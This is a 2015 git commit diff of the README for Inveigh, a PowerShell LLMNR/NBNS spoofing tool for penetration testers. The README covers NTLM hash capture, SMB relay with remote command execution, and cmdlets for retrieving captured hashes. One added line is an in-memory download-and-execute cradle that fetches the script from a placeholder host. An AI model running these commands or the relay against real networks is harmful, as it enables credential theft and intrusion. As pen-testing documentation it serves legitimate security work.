diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:49:28 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:49:28 -0400 |
| commit | a8cc3e29be056545b42ed449610c1329d28a3fac (patch) | |
| tree | b25fb847001d47b755797602139a3141ea6c0228 /README.md | |
| parent | 1455b5f483d6ffdcaaa3d7f04b25d7b38a4b8617 (diff) | |
| download | Inveigh-a8cc3e29be056545b42ed449610c1329d28a3fac.tar.gz Inveigh-a8cc3e29be056545b42ed449610c1329d28a3fac.zip | |
Updated to reflect new module format
Diffstat (limited to 'README.md')
| -rw-r--r-- | README.md | 53 |
1 files changed, 45 insertions, 8 deletions
@@ -1,8 +1,8 @@ # Inveigh -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. # Requirements -Tested minimums are PowerShell 2.0 and .NET 3.5. +Tested minimums are PowerShell 2.0 and .NET 3.5 # Notes 1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. @@ -17,19 +17,56 @@ Tested minimums are PowerShell 2.0 and .NET 3.5. 10. SMB relay support is experimental at this point, use caution if employing on a pen test. # Usage -Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy. +Obtain an elevated administrator or SYSTEM shell. + +Use a method to load the module: + +To import with Import-Method: +Import-Module ./Inveigh.ps1 + +To import with dot source method: +. ./Inveigh.ps1 + +To load into memory using Invoke-Expression: +IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") To execute with default settings: -Inveigh.ps1 +Invoke-Inveigh + +To load and execute with one line: +Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: -Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path' +Invoke-Inveigh -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' To execute with SMB relay enabled: -Inveigh.ps1 -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" +Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" + +Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters + +# Cmdlets +Invoke-Inveigh - Start Inveigh with or without parameters +Get-Inveigh - Get queued console output +Get-InveighLog - Get log entries +Get-InveighNTLM - Get all captured challenge/response hashes +Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes +Get-InveighNTLMv2 - Get captured NTLMv2 challenge/response hashes +Get-InveighStats - Get captured challenge/response counts +Get-InveighHelp - List the cmdlets +Watch-Inveigh - Enable real time console output +Hide-Inveigh - Disable real time console output +Clear-Inveigh - Clear capture, log, smbrelay, and spoof lists +Stop-Inveigh - Stop Inveigh # Screenshots - +Invoke-Inveigh execution with real time console and file output enabled + + +Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 + HTTP to SMB Relay - + + +Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive Powershell Session payloads + |